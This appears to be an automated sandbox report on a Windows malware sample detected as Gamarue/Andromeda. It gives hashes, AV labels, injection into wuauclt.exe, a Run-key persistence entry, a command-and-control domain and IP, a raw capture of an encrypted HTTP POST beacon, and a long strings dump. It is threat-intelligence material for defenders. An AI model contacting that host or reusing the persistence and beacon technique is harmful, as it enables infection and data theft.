Analysis Date: 2014-01-29 11:42:32
MD5: 722f7207e5134be164df092aa78536ae
SHA1: 1a2d342c802bb3708bb753e0aebaa8e70fa1dbc3

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.code md5: 0d15f84766bcaa9f2c95a620f64d8828 sha1: 88a502e3660fcf01e534f87ace02bf77e4286217 size: 10240
Section.text md5: 0904e361fca756ad4be81975c3b8cc5d sha1: 91f5c8721dde2fb70b03e2e15011ba532c5fe528 size: 14848
Section.rdata md5: 606bf741eda001a5604f3c45d7286bf9 sha1: 6869ab443fcc75cdcb6d882afabdc346ceab0f17 size: 512
Section.data md5: f99b90475c2b14454328332542c049d6 sha1: 8364ee5d65782f6f4472218785a07b8e7d38703b size: 3072
Section.rsrc md5: 151e6eadbb44efe9b2ae63b0d0098358 sha1: 20478a5ecb04ddfab2279794056d1e7fab57c617 size: 24576
Timestamp: 1982-02-15 13:53:36 (PE compile timestamp; implausibly early for a PE file and not a reliable build date)
Version: FileVersion: 9.9
ProductName: zddfrhhhrzef
ProductVersion: 9.9
CompanyName: tghzddzbcbb
PEhash: 81ec29d31b3930da6dad456187e9aaf2bd8bb658
AV mcafee: RDN/Spybot.bfr!h
AV avg: PSW.Generic12.VPN
AV msse: Worm:Win32/Gamarue

Runtime Details:


Process
↳ C:\malware.exe

Creates Process: C:\malware.exe

Process
↳ C:\malware.exe

Creates Process: C:\WINDOWS\system32\wuauclt.exe

Process
↳ C:\WINDOWS\system32\wuauclt.exe

Registry: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\36874 ➝
C:\Documents and Settings\All Users\Local Settings\Temp\msdxygra.com\\x00
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\All Users\Local Settings\Temp\msdxygra.com
Creates File: \Device\Afd\Endpoint
Deletes File: C:\1A2D34~1.EXE
Creates Mutex: 3227095050

Network Details:

DNS: update.microsoft.com.nsatc.net
Type: A
65.55.163.222
DNS: mkjjkez-sy.ru
Type: A
144.76.144.27
DNS: www.update.microsoft.com
Type: A
HTTP POST: http://mkjjkez-sy.ru/andro/image.php
User-Agent: Mozilla/4.0
Flows TCP: 192.168.1.1:1031 ➝ 65.55.163.222:80
Flows UDP: 192.168.1.1:1032 ➝ 8.8.4.4:53
Flows TCP: 192.168.1.1:1033 ➝ 144.76.144.27:80

Raw Pcap
0x00000000 (00000)   504f5354 202f616e 64726f2f 696d6167   POST /andro/imag
0x00000010 (00016)   652e7068 70204854 54502f31 2e310d0a   e.php HTTP/1.1..
0x00000020 (00032)   486f7374 3a206d6b 6a6a6b65 7a2d7379   Host: mkjjkez-sy
0x00000030 (00048)   2e72750d 0a557365 722d4167 656e743a   .ru..User-Agent:
0x00000040 (00064)   204d6f7a 696c6c61 2f342e30 0d0a436f    Mozilla/4.0..Co
0x00000050 (00080)   6e74656e 742d5479 70653a20 6170706c   ntent-Type: appl
0x00000060 (00096)   69636174 696f6e2f 782d7777 772d666f   ication/x-www-fo
0x00000070 (00112)   726d2d75 726c656e 636f6465 640d0a43   rm-urlencoded..C
0x00000080 (00128)   6f6e7465 6e742d4c 656e6774 683a2038   ontent-Length: 8
0x00000090 (00144)   380d0a43 6f6e6e65 6374696f 6e3a2063   8..Connection: c
0x000000a0 (00160)   6c6f7365 0d0a0d0a 66484741 54384133   lose....fHGAT8A3
0x000000b0 (00176)   2b6a6e65 6e435231 31717275 416a375a   +jnenCR11qruAj7Z
0x000000c0 (00192)   524c7843 4f316137 38324877 79535748   RLxCO1a782HwySWH
0x000000d0 (00208)   6f584e36 2b556648 57743635 586a6341   oXN6+UfHWt65XjcA
0x000000e0 (00224)   7662446e 50776b78 4a386772 6f41536c   vbDnPwkxJ8groASl
0x000000f0 (00240)   4e675365 6f486d55 46332b6b 6b766761   NgSeoHmUF3+kkvga
0x00000100 (00256)                                         


Strings
........????.

100704b0
CompanyName
FileVersion
ProductName
ProductVersion
StringFileInfo
tghzddzbcbb
Translation
VarFileInfo
VS_VERSION_INFO
zddfrhhhrzef
|{{{{{{
  *//)
;\$$|)
											
0/ag`c^9
0jjjjjjjjjjj
;\$(											1
.-12z&&&
#<14MH
29z498ef9zef
3MMMMMNK4-
4875522189754
											4875522189754
4875522189754'
.4875522189754222222222222
487552218975448998489445674875522189754\
5S/\P0Y
7:a_]<yjjjjj
7:a_]<yjjjjjjjjjjjjjjjjjjjjjjjjj
7lmmnb
\$8+\$
86tCf|
////	+8}j
////	+8}jjjjjjjjjj
/////+8}jjjjjjjjjjjjjjjjjjjjj
8~{jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj&0
(9P|H8
accept
AlphaBlend
AMQQQRH<
:a_]<yjjjjj
b>0/ag`c^9
BitBlt
.;}cav
C_dcHj
C_dcHz
C_dcHzjjjjjjjjj
_CIacos
_CIatan
CloseHandle
closesocket
CoInitialize
COMCTL32.DLL
CoUninitialize
CreateBitmap
CreateCompatibleDC
CreateDIBSection
CreateFileA
CX[\^^^^^\[K'jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj!PZ[^cdeec^\?
CX[\^^^^^\[K'jjjjjjjjyD
CX[\^^^^^\[K' jj!PZ[^^eeec^\?
CZ\[<{ll CZ\[<
@.data
DDRAW.DLL
DeleteCriticalSection
DeleteDC
DeleteMenu
DeleteObject
DestroyAcceleratorTable
DestroyIcon
DestroyWindow
Dh["}~
DirectDrawCreateEx
DllGetVersion
;\$Dux
D$ VPSj
Ejjjjjwwt
EnterCriticalSection
ExitProcess
+f6y/vP1qKj+vK2s+Q==
fclose
FillRect
FreeLibrary
g7LQpaum6s+v4O3Wq5XgqLKu9fc=
GDI32.DLL
GetCurrentThread
GetCursorInfo
GetDeviceCaps
GetDIBits
GetModuleHandleA
GetObjectA
GetObjectType
GetProcAddress
GetStockObject
GetVersionExA
GetWindow
g)m=/3
>H2rqf
haPku4er9val
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HQRSSSSSRQQ;~jjj
HQRSSSSSRQQ;~jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
HQRSSSSSRQQ;~jyyyyylo
HSTTUUTTTSR6 jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
HSTTUUUTTSR6 jjj
HSTTUUUTTSR6 jjjjjjllllljjjjjj
HTWXWWWXWTT2 jj
HTWXWWWXWTT2 jjjjjjjyD
HTWXWWXXWTT2 jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
}Ic:=d
InitCommonControlsEx
InitializeCriticalSection
?InitOnceExecuteOnce
ioctlsocket
iqPxhqmj7/Wjw/P1qIjkpqOG
iqPxja+r/8qv//8=
iqPxn661//iixvX3uaP9vw==
iqrqqaer2/Wq6vk=
iqrqqaer3Ouj4A==
IsAppThemed
JAtB1'
{J-?Ew
jG @D!
-$j*<GH<'$$$$<GH<
 jj *//)
{jjj{0
#jjjj|
+ jjjj{{{}
{jjjj1,
jjjj3,
~ {{jjjjj{
=jjjjj
jjjjj{{{{{|
/jjjjjj
"jjjjjj
{jjjjjj
#jjjjjj3MMMMMNK4-
=jjjjjjj
)+@( jjjjjjj{{
jjjjjjjjj
" {{jjjjjjjjj
)	#jjjjjjjjj
}jjjjjjjjj
jj    jjjjj    jj 
jjjjjj}}}|jjj
jjjjjjjjj*<GH<
)+@({jjjjjjjjjj
/jjjjjjjjjjj
 jjjjjjjjjjjj
{jjjjjjjjj{{{{{jjjjj1,
/jjjjjjjjjjjjjjj
{jjjjjjjjjjjjjjjj
" jjjjjjjjjjjjjjjj{0
{jjjjjjjjjjjjjjjjj
+ jjjjjjjjjjjjjjjjj
 jjjjjjjjjjjjjjjjjj{
~   jjjjjjjjjjjjjjjjjjjj{{{}
+ jjjjjjjjjjjjjjjjjjjj{
jjjjjjjjjjjjjjjjjjjjj
)	#jjjjjjjjjjjjjjjjjjjjj
jjjjjjjjjjjjjjjjjjjjjj
|jjjjjjjjjjjjjjjjjjjjjj
 jjjjjjjjjjjjjjjjjjjjjjj
+jjjjjjjjjjjjjjjjjjjjjjjj
{jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
$jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
{jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj1,
jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
#jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj3MMMMMNK4-
)+@( jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj{{{{{jjjjjjjjjjjjjjj}}}}}jjjjj
jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj{{{{{{jjjjjjjjjjjjjjjjjjjjjjjjj{{{{{{jjjjjjjj{{{}
jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj	LLLTA
jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjxxxxx
jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjxr0VY_efhfec]?
jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjxxx
jjjjjjjjjjjjjjjjjjjjjjjjj@LLN<<
jjjjjjjjyD
jjjjjjjjyyy
jjjjjjj	LLLTA
jjjjj	LLN<
jjjjj!PZ[^^eeec^\?
jjjjjx
|{{jjjjjxxxxxx
jjjjwr0VY_efhfec]?
jjjjyD
jj%r0VY_efhfec]?
jqfpp5Gu9P2p8srroqXE
jqrquKOB8/Wj
jqrquKOP+/ei6f8=
jrTgqrKi3PCq4Ns=
jrTgqrKiyuup5v/qvoc=
\$\K;\$(
Kernel32.dll
KERNEL32.dll
KJ32_e
KRSTTSR<
KWZ[[[X<
L5mt;}
LeaveCriticalSection
|&	LLLTA
LoadCursorA
LoadIconA
LoadLibraryA
* luQ-
m6/3v7Om9tiq6fX6iL4=
malloc
maP3pq+p++2j1ej2rqP2uA==
memcmp
memcpy
memmove
memset
mLXgufX1
mnyyyyyj
=MQQQQQQNI<
=MQQQQQQQI<
mrTsv6OX6Pal4OnqgKPopLS+
msimg32.dll
MSVCRT.dll
n6P2vquizvG04Pv9
n6Pkr4Cu9vw=
nn}}}}	LLN<<
N@Pa-)Q4
nqPxn661//iixvX3uaP9vw==
o7Lhp6o=
OLE32.DLL
OUUWWUU<
PB_DropAccept
PBMGu2
PB_WindowID
pqP3paOrqas=
"PU d{
`.rdata
recvfrom
RemovePropA
RevokeDragDrop
'r/Pq&"
s_BXan=
SelectObject
SendMessageA
SetActiveWindow
SetEndOfFile
SetFilePointer
SetMenu
SetPixel
SFLEu)
sprintf
sqqsv1
strcat
strcpy
_stricmp
strlen
s+veu_@
t+9.u/
`.text
TH$1\~
!This program cannot be run in DOS MODE.
TlsAlloc
UnregisterClassA
USER32.DLL
?UUUUUU
UWXXZZZXXWU. jj
UWXXZZZXXWU. jjjjjjjyD
UWXXZZZXXXU. jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
uxtheme.dll
VBZP}+
@vR`b^`
w7-PZ/3C
W[]cc\[<
WideCharToMultiByte
WindowClass_%d
WriteFile
WSACleanup
WSAGetLastError
WSAStartup
WSOCK32.DLL
wwwpwwwpx
wwwwwp
wwwwww
wwwwwwp
:WX[[\\\[[XJ' jj
:WX[[\\\[[XJ' jjjjjjjyD
:WXZ[\\\[[XJ' jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
Y\ceed\<#j
yDDDFlokmniDDD
Y\deed\<#jjjjjjjjjjjjjjjjjjjjj
Y\deed\<#jjjjyD
YJ,?E&
yjjjjjjjjj
yjjjjjjjjjjjjjjjjjjjjjj
Y`:ndo
YYQ*7}&3
yyyllllyyy
zjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj